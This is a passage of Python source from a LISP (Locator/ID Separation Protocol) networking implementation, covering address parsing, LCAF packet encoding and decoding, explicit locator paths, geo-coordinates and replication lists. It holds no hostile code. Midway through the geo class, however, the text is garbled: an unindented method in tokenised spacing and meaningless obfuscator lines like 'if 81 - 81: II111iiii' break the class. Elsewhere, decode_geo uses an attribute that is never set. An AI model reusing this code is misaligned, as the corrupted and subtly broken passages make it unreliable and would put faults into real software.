        if (self.is_ipv4()):
            return((0xe0ffff00 & self.address) == 0xe0000000)

        if (self.is_ipv6()):
            return(((self.address >> 112) & 0xffff) == 0xff02)

        return(False)

    def is_null(self):
        return(True if (self.afi == LISP_AFI_NONE) else False)

    def is_ultimate_root(self):
        return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)

    def is_iid_range(self):
        return(True if self.afi == LISP_AFI_IID_RANGE else False)

    def is_e164(self):
        return(True if (self.afi == LISP_AFI_E164) else False)

    def is_dist_name(self):
        return(True if (self.afi == LISP_AFI_NAME) else False)

    def is_geo_prefix(self):
        return(True if (self.afi == LISP_AFI_GEO_COORD) else False)

    def is_binary(self):
        if (self.is_dist_name()): return(False)
        if (self.is_geo_prefix()): return(False)
        return(True)

    def store_address(self, addr_str):
        if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)

        #
        # Parse instance-ID if the string is in "[<iid>]<address>" format.
        #
        left = addr_str.find("[")
        right = addr_str.find("]")
        if (left != -1 and right != -1):
            self.instance_id = int(addr_str[left+1:right])
            addr_str = addr_str[right+1::]
            if (self.is_dist_name() == False):
                addr_str = addr_str.replace(" ", "")

        #
        # Parse the AFI-specific address formats.
        #
        if (self.is_ipv4()):
            octets = addr_str.split(".")
            value = int(octets[0]) << 24
            value += int(octets[1]) << 16
            value += int(octets[2]) << 8
            value += int(octets[3])
            self.address = value
        elif (self.is_ipv6()):

            #
            # Special case an address that starts with a two-character
            # group followed by "::" (e.g. "fe::"): after conversion, swap
            # the first two bytes of the hex string back so the two
            # characters become the high-order byte of the first group.
            #
            odd_case = (addr_str[2:4] == "::")
            try:
                addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
            except:
                addr_str = socket.inet_pton(socket.AF_INET6, "0::0")

            addr_str = binascii.hexlify(addr_str)

            if (odd_case):
                addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]

            self.address = int(addr_str, 16)

        elif (self.is_geo_prefix()):
            geo = lisp_geo(None)
            geo.name = "geo-prefix-{}".format(geo)
            geo.parse_geo_string(addr_str)
            self.address = geo
        elif (self.is_mac()):
            addr_str = addr_str.replace("-", "")
            value = int(addr_str, 16)
            self.address = value
        elif (self.is_e164()):
            addr_str = addr_str[1::]
            value = int(addr_str, 16)
            self.address = value << 4
        elif (self.is_dist_name()):
            self.address = addr_str.replace("'", "")

        self.mask_len = self.host_mask_len()

    def store_prefix(self, prefix_str):
        if (self.is_geo_string(prefix_str)):
            index = prefix_str.find("]")
            mask_len = len(prefix_str[index+1::]) * 8
        elif (prefix_str.find("/") != -1):
            prefix_str, mask_len = prefix_str.split("/")
        else:
            left = prefix_str.find("'")
            if (left == -1): return
            right = prefix_str.find("'", left+1)
            if (right == -1): return
            mask_len = len(prefix_str[left+1:right]) * 8

        self.string_to_afi(prefix_str)
        self.store_address(prefix_str)
        self.mask_len = int(mask_len)
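
    #
    # Illustrative sketch (not executed by the module): store_prefix()
    # accepts "[<iid>]<address>/<mask-len>" strings, geo-prefix strings,
    # or quoted distinguished-names, deriving the mask length from the
    # "/<len>" suffix or the name length.
    #
    #   addr = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   addr.store_prefix("[1000]10.0.0.0/8")
    #   # addr.instance_id == 1000, addr.afi == LISP_AFI_IPV4,
    #   # addr.mask_len == 8
    #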

    def zero_host_bits(self):
        if (self.mask_len < 0): return
        mask = (2 ** self.mask_len) - 1
        host_bits = self.addr_length() * 8 - self.mask_len
        mask <<= host_bits
        self.address &= mask

    def is_geo_string(self, addr_str):
        index = addr_str.find("]")
        if (index != -1): addr_str = addr_str[index+1::]

        geo_str = addr_str.split("/")
        if (len(geo_str) == 2):
            if (geo_str[1].isdigit() == False): return(False)

        geo_str = geo_str[0]
        geo_str = geo_str.split("-")
        parts = len(geo_str)
        if (parts < 8 or parts > 9): return(False)

        #
        # Fields 0-2 are latitude degrees/minutes/seconds, field 3 the
        # N/S hemisphere letter; fields 4-6 are longitude and field 7 the
        # W/E letter. All other fields must be numeric.
        #
        for index in range(0, parts):
            if (index == 3):
                if (geo_str[index] in ["N", "S"]): continue
                return(False)

            if (index == 7):
                if (geo_str[index] in ["W", "E"]): continue
                return(False)

            if (geo_str[index].isdigit() == False): return(False)

        return(True)

    def string_to_afi(self, addr_str):
        if (addr_str.count("'") == 2):
            self.afi = LISP_AFI_NAME
            return

        if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
        elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
        elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
        elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
        elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
        else: self.afi = LISP_AFI_NONE

    def print_address(self):
        addr = self.print_address_no_iid()
        iid = "[" + str(self.instance_id)
        for i in self.iid_list: iid += "," + str(i)
        iid += "]"
        addr = "{}{}".format(iid, addr)
        return(addr)

    def print_address_no_iid(self):
        if (self.is_ipv4()):
            addr = self.address
            byte1 = addr >> 24
            byte2 = (addr >> 16) & 0xff
            byte3 = (addr >> 8) & 0xff
            byte4 = addr & 0xff
            return("{}.{}.{}.{}".format(byte1, byte2, byte3, byte4))
        elif (self.is_ipv6()):
            addr_str = lisp_hex_string(self.address).zfill(32)
            addr_str = binascii.unhexlify(addr_str)
            addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
            return("{}".format(addr_str))
        elif (self.is_geo_prefix()):
            return("{}".format(self.address.print_geo()))
        elif (self.is_mac()):
            addr_str = lisp_hex_string(self.address).zfill(12)
            addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
                addr_str[8:12])
            return("{}".format(addr_str))
        elif (self.is_e164()):
            addr_str = lisp_hex_string(self.address).zfill(15)
            return("+{}".format(addr_str))
        elif (self.is_dist_name()):
            return("'{}'".format(self.address))
        elif (self.is_null()):
            return("no-address")

        return("unknown-afi:{}".format(self.afi))

    def print_prefix(self):
        if (self.is_ultimate_root()): return("[*]")
        if (self.is_iid_range()):
            if (self.mask_len == 32): return("[{}]".format(self.instance_id))
            upper = self.instance_id + (2 ** (32 - self.mask_len) - 1)
            return("[{}-{}]".format(self.instance_id, upper))

        addr = self.print_address()
        if (self.is_dist_name()): return(addr)
        if (self.is_geo_prefix()): return(addr)

        index = addr.find("no-address")
        if (index == -1):
            addr = "{}/{}".format(addr, str(self.mask_len))
        else:
            addr = addr[0:index]

        return(addr)

    def print_prefix_no_iid(self):
        addr = self.print_address_no_iid()
        if (self.is_dist_name()): return(addr)
        if (self.is_geo_prefix()): return(addr)
        return("{}/{}".format(addr, str(self.mask_len)))

    def print_prefix_url(self):
        if (self.is_ultimate_root()): return("0--0")
        addr = self.print_address()
        index = addr.find("]")
        if (index != -1): addr = addr[index+1::]
        if (self.is_geo_prefix()):
            addr = addr.replace("/", "-")
            return("{}-{}".format(self.instance_id, addr))

        return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))

    def print_sg(self, g):
        source = self.print_prefix()
        source_index = source.find("]") + 1
        group = g.print_prefix()
        group_index = group.find("]") + 1
        sg_str = "[{}]({}, {})".format(self.instance_id,
            source[source_index::], group[group_index::])
        return(sg_str)
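
    #
    # Illustrative output (a sketch): for a source of [1000]10.1.1.1/32
    # and a group of 224.1.1.1/32, print_sg() returns
    # "[1000](10.1.1.1/32, 224.1.1.1/32)".
    #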

    def hash_address(self, addr):
        addr1 = self.address
        addr2 = addr.address

        if (self.is_geo_prefix()): addr1 = self.address.print_geo()
        if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()

        #
        # hexlify() returns hex digits, so parse the first byte of a
        # string address base-16 before hashing.
        #
        if (type(addr1) == str):
            addr1 = int(binascii.hexlify(addr1[0:1]), 16)

        if (type(addr2) == str):
            addr2 = int(binascii.hexlify(addr2[0:1]), 16)

        return(addr1 ^ addr2)

    def is_more_specific(self, prefix):
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)

        mask_len = prefix.mask_len
        if (prefix.afi == LISP_AFI_IID_RANGE):
            size = 2 ** (32 - mask_len)
            start = prefix.instance_id
            end = start + size
            return(self.instance_id in range(start, end))

        if (self.instance_id != prefix.instance_id): return(False)
        if (self.afi != prefix.afi):
            if (prefix.afi != LISP_AFI_NONE): return(False)

        #
        # Non-binary addresses (distinguished-names and geo-prefixes)
        # compare as strings: self is more specific when prefix is a
        # leading substring.
        #
        if (self.is_binary() == False):
            if (prefix.afi == LISP_AFI_NONE): return(True)
            if (type(self.address) != type(prefix.address)): return(False)
            addr = self.address
            paddr = prefix.address
            if (self.is_geo_prefix()):
                addr = self.address.print_geo()
                paddr = prefix.address.print_geo()

            if (len(addr) < len(paddr)): return(False)
            return(addr.find(paddr) == 0)

        #
        # Binary addresses: mask self down to the prefix's mask length
        # and compare.
        #
        if (self.mask_len < mask_len): return(False)

        host_bits = (prefix.addr_length() * 8) - mask_len
        mask = (2 ** mask_len - 1) << host_bits
        return((self.address & mask) == prefix.address)
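
    #
    # Illustrative check (a sketch, not executed): with the same
    # instance-ID, 10.1.0.0/16 is more specific than 10.0.0.0/8.
    #
    #   a = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   a.store_prefix("[0]10.1.0.0/16")
    #   b = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   b.store_prefix("[0]10.0.0.0/8")
    #   # a.is_more_specific(b) is True, b.is_more_specific(a) is False
    #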

    def mask_address(self, mask_len):
        host_bits = (self.addr_length() * 8) - mask_len
        mask = (2 ** mask_len - 1) << host_bits
        self.address &= mask

    def is_exact_match(self, prefix):
        if (self.instance_id != prefix.instance_id): return(False)
        p1 = self.print_prefix()
        p2 = prefix.print_prefix() if prefix else ""
        return(p1 == p2)

    def is_local(self):
        if (self.is_ipv4()):
            rloc = lisp_myrlocs[0]
            if (rloc == None): return(False)
            rloc = rloc.print_address_no_iid()
            return(self.print_address_no_iid() == rloc)

        if (self.is_ipv6()):
            rloc = lisp_myrlocs[1]
            if (rloc == None): return(False)
            rloc = rloc.print_address_no_iid()
            return(self.print_address_no_iid() == rloc)

        return(False)

    def store_iid_range(self, iid, mask_len):
        if (self.afi == LISP_AFI_NONE):
            if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
            else: self.afi = LISP_AFI_IID_RANGE

        self.instance_id = iid
        self.mask_len = mask_len

    def lcaf_length(self, lcaf_type):
        length = self.addr_length() + 2
        if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
        if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
        if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
        if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
        if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
        if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
        if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
        return(length)

    def lcaf_encode_iid(self):
        lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
        addr_length = socket.htons(self.lcaf_length(lcaf_type))
        iid = self.instance_id
        afi = self.afi
        mask_len = 0
        if (afi < 0):
            if (self.afi == LISP_AFI_GEO_COORD):
                afi = LISP_AFI_LCAF
                mask_len = 0
            else:
                afi = 0
                mask_len = self.mask_len

        packet = struct.pack("BBBBH", 0, 0, lcaf_type, mask_len, addr_length)
        packet += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
        if (afi == 0): return(packet)

        if (self.afi == LISP_AFI_GEO_COORD):
            packet = packet[0:-2]
            packet += self.address.encode_geo()
            return(packet)

        packet += self.pack_address()
        return(packet)

    def lcaf_decode_iid(self, packet):
        packet_format = "BBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        rsvd1, flags, lcaf_type, iid_mask_len, length = \
            struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)

        packet_format = "IH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        iid, afi = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        length = socket.ntohs(length)
        self.instance_id = socket.ntohl(iid)
        afi = socket.ntohs(afi)
        self.afi = afi
        if (iid_mask_len != 0 and afi == 0): self.mask_len = iid_mask_len
        if (afi == 0):
            self.afi = LISP_AFI_IID_RANGE if iid_mask_len else \
                LISP_AFI_ULTIMATE_ROOT

        #
        # No address is encoded after the instance-ID.
        #
        if (afi == 0): return(packet)

        #
        # A distinguished-name encoding follows.
        #
        if (self.is_dist_name()):
            packet, self.address = lisp_decode_dist_name(packet)
            self.mask_len = len(self.address) * 8
            return(packet)

        #
        # A nested LCAF follows; the only nested type handled here is the
        # Geo-Coordinate LCAF.
        #
        if (afi == LISP_AFI_LCAF):
            packet_format = "BBBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)

            rsvd1, rsvd2, lcaf_type, rsvd3, lcaf_len = \
                struct.unpack(packet_format, packet[:format_size])

            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]
            if (lcaf_len > len(packet)): return(None)

            geo = lisp_geo("")
            self.afi = LISP_AFI_GEO_COORD
            self.address = geo
            packet = geo.decode_geo(packet, lcaf_len, rsvd3)
            self.mask_len = self.host_mask_len()
            return(packet)

        addr_length = self.addr_length()
        if (len(packet) < addr_length): return(None)

        packet = self.unpack_address(packet)
        return(packet)

    def lcaf_encode_sg(self, group):
        lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
        iid = socket.htonl(self.instance_id)
        length = socket.htons(self.lcaf_length(lcaf_type))
        packet = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, length, iid,
            0, self.mask_len, group.mask_len)

        packet += struct.pack("H", socket.htons(self.afi))
        packet += self.pack_address()
        packet += struct.pack("H", socket.htons(group.afi))
        packet += group.pack_address()
        return(packet)
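
    #
    # For reference, the "BBBBHIHBB" header above follows the Multicast
    # Info LCAF layout (LISP Canonical Address Format, RFC 8060): Rsvd1,
    # Flags, Type, Rsvd2, Length, Instance-ID, Reserved, Source-MaskLen,
    # Group-MaskLen, followed by the AFI-encoded source and group
    # addresses.
    #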

    def lcaf_decode_sg(self, packet):
        packet_format = "BBBBHIHBB"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        rsvd1, flags, lcaf_type, rsvd2, length, iid, reserved, source_ml, \
            group_ml = struct.unpack(packet_format, packet[:format_size])

        packet = packet[format_size::]

        if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])

        self.instance_id = socket.ntohl(iid)
        length = socket.ntohs(length) - 8

        #
        # Parse the source AFI and address.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])
        if (length < format_size): return([None, None])

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        length -= format_size
        self.afi = socket.ntohs(afi)
        self.mask_len = source_ml
        addr_length = self.addr_length()
        if (length < addr_length): return([None, None])

        packet = self.unpack_address(packet)
        if (packet == None): return([None, None])

        length -= addr_length

        #
        # Parse the group AFI and address.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])
        if (length < format_size): return([None, None])

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        length -= format_size
        group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        group.afi = socket.ntohs(afi)
        group.mask_len = group_ml
        group.instance_id = self.instance_id
        addr_length = self.addr_length()
        if (length < addr_length): return([None, None])

        packet = group.unpack_address(packet)
        if (packet == None): return([None, None])

        return([packet, group])

    def lcaf_decode_eid(self, packet):
        packet_format = "BBB"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        #
        # Dispatch on the LCAF type field. Instance-ID, Multicast Info,
        # and Geo-Coordinate LCAFs are supported here.
        #
        rsvd, flags, lcaf_type = struct.unpack(packet_format,
            packet[:format_size])

        if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
            return([self.lcaf_decode_iid(packet), None])
        elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
            packet, group = self.lcaf_decode_sg(packet)
            return([packet, group])
        elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
            packet_format = "BBBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)

            rsvd1, rsvd2, lcaf_type, rsvd3, lcaf_len = \
                struct.unpack(packet_format, packet[:format_size])

            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]
            if (lcaf_len > len(packet)): return(None)

            geo = lisp_geo("")
            self.instance_id = 0
            self.afi = LISP_AFI_GEO_COORD
            self.address = geo
            packet = geo.decode_geo(packet, lcaf_len, rsvd3)
            self.mask_len = self.host_mask_len()

        return([packet, None])

class lisp_elp_node():
    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.probe = False
        self.strict = False
        self.eid = False
        self.we_are_last = False

    def copy_elp_node(self):
        elp_node = lisp_elp_node()
        elp_node.address.copy_address(self.address)
        elp_node.probe = self.probe
        elp_node.strict = self.strict
        elp_node.eid = self.eid
        elp_node.we_are_last = self.we_are_last
        return(elp_node)

class lisp_elp():
    def __init__(self, name):
        self.elp_name = name
        self.elp_nodes = []
        self.use_elp_node = None
        self.we_are_last = False

    def copy_elp(self):
        elp = lisp_elp(self.elp_name)
        elp.use_elp_node = self.use_elp_node
        elp.we_are_last = self.we_are_last
        for elp_node in self.elp_nodes:
            elp.elp_nodes.append(elp_node.copy_elp_node())

        return(elp)

    def print_elp(self, want_marker):
        elp_str = ""
        for elp_node in self.elp_nodes:
            marker = ""
            if (want_marker):
                if (elp_node == self.use_elp_node):
                    marker = "*"
                elif (elp_node.we_are_last):
                    marker = "x"

            elp_str += "{}{}({}{}{}), ".format(marker,
                elp_node.address.print_address_no_iid(),
                "r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
                "S" if elp_node.strict else "s")

        return(elp_str[0:-2] if elp_str != "" else "")
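
    #
    # Illustrative reading of print_elp() output (based on the format
    # string above): each hop prints as "<addr>(rPs)" where "r"/"R"
    # distinguishes an EID from an RLOC hop, "P"/"p" shows whether the
    # probe-bit is set, and "S"/"s" whether the strict-bit is set; "*"
    # flags the selected next hop and "x" flags this node when it is the
    # last hop in the path.
    #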

    def select_elp_node(self):
        ipv4, ipv6, device = lisp_myrlocs
        index = None

        for elp_node in self.elp_nodes:
            if (ipv4 and elp_node.address.is_exact_match(ipv4)):
                index = self.elp_nodes.index(elp_node)
                break

            if (ipv6 and elp_node.address.is_exact_match(ipv6)):
                index = self.elp_nodes.index(elp_node)
                break

        #
        # If none of our RLOCs appear in the path, use the first ELP node.
        #
        if (index == None):
            self.use_elp_node = self.elp_nodes[0]
            elp_node.we_are_last = False
            return

        #
        # If we are the last hop in the path, there is no next node to
        # re-encapsulate to.
        #
        if (self.elp_nodes[-1] == self.elp_nodes[index]):
            self.use_elp_node = None
            elp_node.we_are_last = True
            return

        #
        # Otherwise, use the node that follows us in the path.
        #
        self.use_elp_node = self.elp_nodes[index + 1]
        return

class lisp_geo():
    def __init__(self, name):
        self.geo_name = name
        self.latitude = 0xffffffff
        self.lat_mins = 0
        self.lat_secs = 0
        self.longitude = 0xffffffff
        self.long_mins = 0
        self.long_secs = 0
        self.altitude = -1
        self.radius = 0

    def copy_geo(self):
        geo = lisp_geo(self.geo_name)
        geo.latitude = self.latitude
        geo.lat_mins = self.lat_mins
        geo.lat_secs = self.lat_secs
        geo.longitude = self.longitude
        geo.long_mins = self.long_mins
        geo.long_secs = self.long_secs
        geo.altitude = self.altitude
        geo.radius = self.radius
        return(geo)
def no_geo_altitude ( self ) :
return ( self . altitude == - 1 )
if 81 - 81: II111iiii
if 55 - 55: O0 + o0oOOo0O0Ooo * I1IiiI - OoooooooOO
    def parse_geo_string(self, geo_str):
        index = geo_str.find("]")
        if (index != -1): geo_str = geo_str[index+1::]

        #
        # A "/<radius>" suffix makes this a geo-prefix rather than a
        # geo-point.
        #
        if (geo_str.find("/") != -1):
            geo_str, radius = geo_str.split("/")
            self.radius = int(radius)

        geo_str = geo_str.split("-")
        if (len(geo_str) < 8): return(False)

        latitude = geo_str[0:4]
        longitude = geo_str[4:8]

        #
        # An optional 9th element is the altitude.
        #
        if (len(geo_str) > 8): self.altitude = int(geo_str[8])

        #
        # Parse latitude. The northern hemisphere is stored negative.
        #
        self.latitude = int(latitude[0])
        self.lat_mins = int(latitude[1])
        self.lat_secs = int(latitude[2])
        if (latitude[3] == "N"): self.latitude = -self.latitude

        #
        # Parse longitude. The eastern hemisphere is stored negative.
        #
        self.longitude = int(longitude[0])
        self.long_mins = int(longitude[1])
        self.long_secs = int(longitude[2])
        if (longitude[3] == "E"): self.longitude = -self.longitude
        return(True)

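    #
    # The string format parsed above is (after stripping an optional
    # "[<iid>]" prefix):
    #
    #   <lat-deg>-<mins>-<secs>-<N|S>-<long-deg>-<mins>-<secs>-<E|W>
    #       [-<altitude>][/<radius>]
    #
    # For example (illustrative values), "37-23-30-N-121-57-36-W-30/50"
    # is a point at 37 deg 23' 30" N, 121 deg 57' 36" W, altitude 30,
    # carried as a geo-prefix with a radius of 50.
    #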
    def print_geo(self):
        n_or_s = "N" if self.latitude < 0 else "S"
        e_or_w = "E" if self.longitude < 0 else "W"

        geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
            self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
            self.long_mins, self.long_secs, e_or_w)

        if (self.no_geo_altitude() == False):
            geo_str += "-" + str(self.altitude)

        if (self.radius != 0): geo_str += "/{}".format(self.radius)
        return(geo_str)

    def geo_url(self):
        #
        # Default to zoom level 10 when LISP_GEO_ZOOM_LEVEL is unset or
        # not numeric. os.getenv() is given a "" default so isdigit() is
        # never applied to None.
        #
        zoom = os.getenv("LISP_GEO_ZOOM_LEVEL", "")
        zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
        lat, lon = self.dms_to_decimal()
        url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" +
            "&markers=color:blue%7Clabel:lisp%7C{},{}" +
            "&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat,
            lon, zoom)
        return(url)

    def print_geo_url(self):
        geo_str = self.print_geo()
        if (self.radius == 0):
            url = self.geo_url()
            html = "<a href='{}'>{}</a>".format(url, geo_str)
        else:
            url = geo_str.replace("/", "-")
            html = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo_str)

        return(html)

    def dms_to_decimal(self):
        degrees, minutes, seconds = self.latitude, self.lat_mins, \
            self.lat_secs
        decimal = float(abs(degrees))
        decimal += float(minutes * 60 + seconds) / 3600
        if (degrees > 0): decimal = -decimal
        dd_lat = decimal

        degrees, minutes, seconds = self.longitude, self.long_mins, \
            self.long_secs
        decimal = float(abs(degrees))
        decimal += float(minutes * 60 + seconds) / 3600
        if (degrees > 0): decimal = -decimal
        dd_long = decimal
        return((dd_lat, dd_long))

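    #
    # Worked example (illustrative): "37-23-30-N" is stored internally
    # as latitude -37 (north is negated by parse_geo_string()), so
    # dms_to_decimal() returns 37 + (23*60 + 30)/3600 = +37.3917 degrees.
    # "121-57-36-W" is stored as +121, giving -(121 + (57*60 + 36)/3600)
    # = -121.96. The sign flip restores the usual convention of
    # north/east positive, west/south negative.
    #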
    def get_distance(self, geo_point):
        dd_prefix = self.dms_to_decimal()
        dd_point = geo_point.dms_to_decimal()
        distance = vincenty(dd_prefix, dd_point)
        return(distance.km)

    def point_in_circle(self, geo_point):
        km = self.get_distance(geo_point)
        return(km <= self.radius)

    def encode_geo(self):
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        lcaf_length = socket.htons(20 + 2)
        flags = 0

        lat = abs(self.latitude)
        lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
        if (self.latitude < 0): flags |= 0x40

        lon = abs(self.longitude)
        lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
        if (self.longitude < 0): flags |= 0x20

        alt = 0
        if (self.no_geo_altitude() == False):
            alt = socket.htonl(self.altitude)
            flags |= 0x10

        radius = socket.htons(self.radius)
        if (radius != 0): flags |= 0x06

        geo_packet = struct.pack("HBBBBH", lcaf_afi, 0, 0,
            LISP_LCAF_GEO_COORD_TYPE, 0, lcaf_length)
        geo_packet += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat,
            lat_ms >> 16, socket.htons(lat_ms & 0x0ffff), lon,
            lon_ms >> 16, socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)

        return(geo_packet)

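    #
    # Note on the packing above: minutes and seconds travel as
    # milliseconds-of-degree, ((mins * 60) + secs) * 1000, which is at
    # most (59*60 + 59) * 1000 = 3,599,000 and therefore fits in the 24
    # bits encoded as a high byte plus a 16-bit network-order low half.
    #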
    def decode_geo(self, packet, lcaf_len, radius_hi):
        packet_format = "BBHBBHBBHIHHH"
        format_size = struct.calcsize(packet_format)
        if (lcaf_len < format_size): return(None)

        flags, r1, r2, lat, lat_ms_hi, lat_ms_lo, lon, lon_ms_hi, \
            lon_ms_lo, alt, radius, r3, afi = \
            struct.unpack(packet_format, packet[:format_size])

        #
        # A nested LCAF encoded RLOC address is not supported.
        #
        afi = socket.ntohs(afi)
        if (afi == LISP_AFI_LCAF): return(None)

        if (flags & 0x40): lat = -lat
        self.latitude = lat
        lat_secs = ((lat_ms_hi << 16) | socket.ntohs(lat_ms_lo)) / 1000
        self.lat_mins = lat_secs / 60
        self.lat_secs = lat_secs % 60

        if (flags & 0x20): lon = -lon
        self.longitude = lon
        lon_secs = ((lon_ms_hi << 16) | socket.ntohs(lon_ms_lo)) / 1000
        self.long_mins = lon_secs / 60
        self.long_secs = lon_secs % 60

        self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
        radius = socket.ntohs(radius)
        self.radius = radius if (flags & 0x02) else radius * 1000

        self.geo_name = None
        packet = packet[format_size::]

        #
        # An RLOC address may follow the geo-coordinates.
        #
        if (afi != 0):
            self.rloc.afi = afi
            packet = self.rloc.unpack_address(packet)
            self.rloc.mask_len = self.rloc.host_mask_len()

        return(packet)

class lisp_rle_node():
    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.level = 0
        self.translated_port = 0
        self.rloc_name = None

    def copy_rle_node(self):
        rle_node = lisp_rle_node()
        rle_node.address.copy_address(self.address)
        rle_node.level = self.level
        rle_node.translated_port = self.translated_port
        rle_node.rloc_name = self.rloc_name
        return(rle_node)

    def store_translated_rloc(self, rloc, port):
        self.address.copy_address(rloc)
        self.translated_port = port

    def get_encap_keys(self):
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.address.print_address_no_iid() + ":" + port

        try:
            keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
            return(None, None)
        except:
            return(None, None)

class lisp_rle():
    def __init__(self, name):
        self.rle_name = name
        self.rle_nodes = []
        self.rle_forwarding_list = []

    def copy_rle(self):
        rle = lisp_rle(self.rle_name)
        for rle_node in self.rle_nodes:
            rle.rle_nodes.append(rle_node.copy_rle_node())

        rle.build_forwarding_list()
        return(rle)

    def print_rle(self, html, do_formatting):
        rle_str = ""
        for rle_node in self.rle_nodes:
            port = rle_node.translated_port

            rloc_name = ""
            if (rle_node.rloc_name != None):
                rloc_name = rle_node.rloc_name
                if (do_formatting): rloc_name = blue(rloc_name, html)
                rloc_name = "({})".format(rloc_name)

            addr_str = rle_node.address.print_address_no_iid()
            if (rle_node.address.is_local()): addr_str = red(addr_str, html)
            rle_str += "{}{}{}, ".format(addr_str,
                "" if port == 0 else ":" + str(port), rloc_name)

        return(rle_str[0:-2] if rle_str != "" else "")

    def build_forwarding_list(self):
        #
        # Find the level of the first RLE node above the level of a local
        # RLE node. Note rle_node holds the node that caused the break
        # (or the last node) after the loop.
        #
        level = -1
        for rle_node in self.rle_nodes:
            if (level == -1):
                if (rle_node.address.is_local()): level = rle_node.level
            else:
                if (rle_node.level > level): break

        level = 0 if level == -1 else rle_node.level

        #
        # Build the replication list from nodes at that level, excluding
        # local addresses unless this system is an RTR.
        #
        self.rle_forwarding_list = []
        for rle_node in self.rle_nodes:
            if (rle_node.level == level or (level == 0 and
                rle_node.level == 128)):
                if (lisp_i_am_rtr == False and rle_node.address.is_local()):
                    addr_str = rle_node.address.print_address_no_iid()
                    lprint("Exclude local RLE RLOC {}".format(addr_str))
                    continue

                self.rle_forwarding_list.append(rle_node)

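    #
    # Illustrative walk-through of build_forwarding_list() (example
    # values, not from the original source): with nodes (A, level 0),
    # (B, level 0), (C, level 1) and A a local address, the loop stops at
    # C, so the forwarding list holds the level-1 nodes -- the next level
    # up from this node in the replication tree. When no node is local,
    # level 0 is used (with level 128 also accepted), which is what an
    # ITR replicating toward the root of the tree wants.
    #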
class lisp_json():
    def __init__(self, name, string, encrypted=False, ms_encrypt=False):
        self.json_name = name
        self.json_string = string
        self.json_encrypted = False

